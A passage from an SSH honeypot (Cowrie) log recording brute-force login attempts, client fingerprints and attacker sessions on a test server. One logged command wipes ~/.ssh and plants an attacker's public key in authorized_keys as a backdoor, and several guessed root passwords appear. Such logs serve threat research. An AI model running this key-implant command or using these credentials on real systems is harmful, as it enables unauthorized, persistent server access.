20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:21:41.437196Z","src_ip":"212.227.235.229","session":"cf9cd3db6549"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"latest","message":"login attempt [ubuntu/latest] failed","sensor":"my-vps","timestamp":"2025-08-31T00:21:42.687250Z","src_ip":"212.227.235.229","session":"cf9cd3db6549"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:21:43.992861Z","src_ip":"212.227.235.229","session":"cf9cd3db6549"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57102,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac10a91730d1","protocol":"ssh","message":"New connection: 212.227.235.229:57102 (1.2.3.4:22) [session: ac10a91730d1]","sensor":"my-vps","timestamp":"2025-08-31T00:22:14.198132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:22:15.107089Z","src_ip":"212.227.235.229","session":"ac10a91730d1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:22:15.133364Z","src_ip":"212.227.235.229","session":"ac10a91730d1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"root123","message":"login attempt [admin/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:22:21.000146Z","src_ip":"212.227.235.229","session":"ac10a91730d1"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:22:22.919873Z","src_ip":"212.227.235.229","session":"ac10a91730d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48422,"dst_ip":"1.2.3.4","dst_port":22,"session":"dedc14768923","protocol":"ssh","message":"New connection: 212.227.125.160:48422 (1.2.3.4:22) [session: dedc14768923]","sensor":"my-vps","timestamp":"2025-08-31T00:22:35.700952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:22:36.401335Z","src_ip":"212.227.125.160","session":"dedc14768923"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:22:36.402066Z","src_ip":"212.227.125.160","session":"dedc14768923"}
{"eventid":"cowrie.login.failed","username":"admin","password":"root123","message":"login attempt [admin/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:22:39.151918Z","src_ip":"212.227.125.160","session":"dedc14768923"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:22:40.542188Z","src_ip":"212.227.125.160","session":"dedc14768923"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55426,"dst_ip":"1.2.3.4","dst_port":22,"session":"4480bb154cbb","protocol":"ssh","message":"New connection: 212.227.235.229:55426 (1.2.3.4:22) [session: 4480bb154cbb]","sensor":"my-vps","timestamp":"2025-08-31T00:22:43.257209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:22:43.257945Z","src_ip":"212.227.235.229","session":"4480bb154cbb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:22:43.561083Z","src_ip":"212.227.235.229","session":"4480bb154cbb"}
{"eventid":"cowrie.login.success","username":"root","password":"Tele@123","message":"login attempt [root/Tele@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:22:44.811627Z","src_ip":"212.227.235.229","session":"4480bb154cbb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:22:45.447013Z","src_ip":"212.227.235.229","session":"4480bb154cbb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:22:45.447834Z","src_ip":"212.227.235.229","session":"4480bb154cbb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:22:45.448659Z","src_ip":"212.227.235.229","session":"4480bb154cbb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:22:45.751918Z","src_ip":"212.227.235.229","session":"4480bb154cbb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:22:46.423884Z","src_ip":"212.227.235.229","session":"4480bb154cbb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:22:46.424672Z","src_ip":"212.227.235.229","session":"4480bb154cbb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:22:46.728755Z","src_ip":"212.227.235.229","session":"4480bb154cbb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:22:46.729633Z","src_ip":"212.227.235.229","session":"4480bb154cbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34434,"dst_ip":"1.2.3.4","dst_port":22,"session":"e996efcd6ada","protocol":"ssh","message":"New connection: 212.227.235.229:34434 (1.2.3.4:22) [session: e996efcd6ada]","sensor":"my-vps","timestamp":"2025-08-31T00:22:47.032168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:22:47.033463Z","src_ip":"212.227.235.229","session":"e996efcd6ada"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:22:47.338519Z","src_ip":"212.227.235.229","session":"e996efcd6ada"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:22:48.596728Z","src_ip":"212.227.235.229","session":"e996efcd6ada"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:22:49.904448Z","src_ip":"212.227.235.229","session":"e996efcd6ada"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38274,"dst_ip":"1.2.3.4","dst_port":22,"session":"eead23082120","protocol":"ssh","message":"New connection: 212.227.235.229:38274 (1.2.3.4:22) [session: eead23082120]","sensor":"my-vps","timestamp":"2025-08-31T00:22:50.204632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:22:50.205740Z","src_ip":"212.227.235.229","session":"eead23082120"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:22:50.507919Z","src_ip":"212.227.235.229","session":"eead23082120"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:22:51.757956Z","src_ip":"212.227.235.229","session":"eead23082120"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:22:52.070234Z","src_ip":"212.227.235.229","session":"eead23082120"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:22:52.071286Z","src_ip":"212.227.235.229","session":"4480bb154cbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37790,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3c873a8997c","protocol":"ssh","message":"New connection: 212.227.125.160:37790 (1.2.3.4:22) [session: a3c873a8997c]","sensor":"my-vps","timestamp":"2025-08-31T00:22:58.078968Z"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:23:00.939140Z","src_ip":"212.227.125.160","session":"a3c873a8997c"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":47082,"dst_ip":"1.2.3.4","dst_port":22,"session":"19b9c55734d9","protocol":"ssh","message":"New connection: 201.148.180.50:47082 (1.2.3.4:22) [session: 19b9c55734d9]","sensor":"my-vps","timestamp":"2025-08-31T00:23:15.649298Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41892,"dst_ip":"1.2.3.4","dst_port":22,"session":"9dbb6c32f563","protocol":"ssh","message":"New connection: 212.227.235.229:41892 (1.2.3.4:22) [session: 9dbb6c32f563]","sensor":"my-vps","timestamp":"2025-08-31T00:23:15.830559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:23:16.685760Z","src_ip":"212.227.235.229","session":"9dbb6c32f563"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:23:16.686582Z","src_ip":"212.227.235.229","session":"9dbb6c32f563"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:23:16.699790Z","src_ip":"201.148.180.50","session":"19b9c55734d9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T00:23:16.700760Z","src_ip":"201.148.180.50","session":"19b9c55734d9"}
{"eventid":"cowrie.login.success","username":"root","password":"010200","message":"login attempt [root/010200] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:23:21.878772Z","src_ip":"201.148.180.50","session":"19b9c55734d9"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssw0rd123","message":"login attempt [admin/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:23:22.741202Z","src_ip":"212.227.235.229","session":"9dbb6c32f563"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52326,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d5921a19e44","protocol":"ssh","message":"New connection: 212.227.125.160:52326 (1.2.3.4:22) [session: 2d5921a19e44]","sensor":"my-vps","timestamp":"2025-08-31T00:23:24.287338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:23:24.288084Z","src_ip":"212.227.125.160","session":"2d5921a19e44"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T00:23:24.361430Z","src_ip":"212.227.125.160","session":"2d5921a19e44"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:23:24.550241Z","src_ip":"201.148.180.50","session":"19b9c55734d9"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-31T00:23:24.550945Z","src_ip":"201.148.180.50","session":"19b9c55734d9"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:23:24.719026Z","src_ip":"212.227.235.229","session":"9dbb6c32f563"}
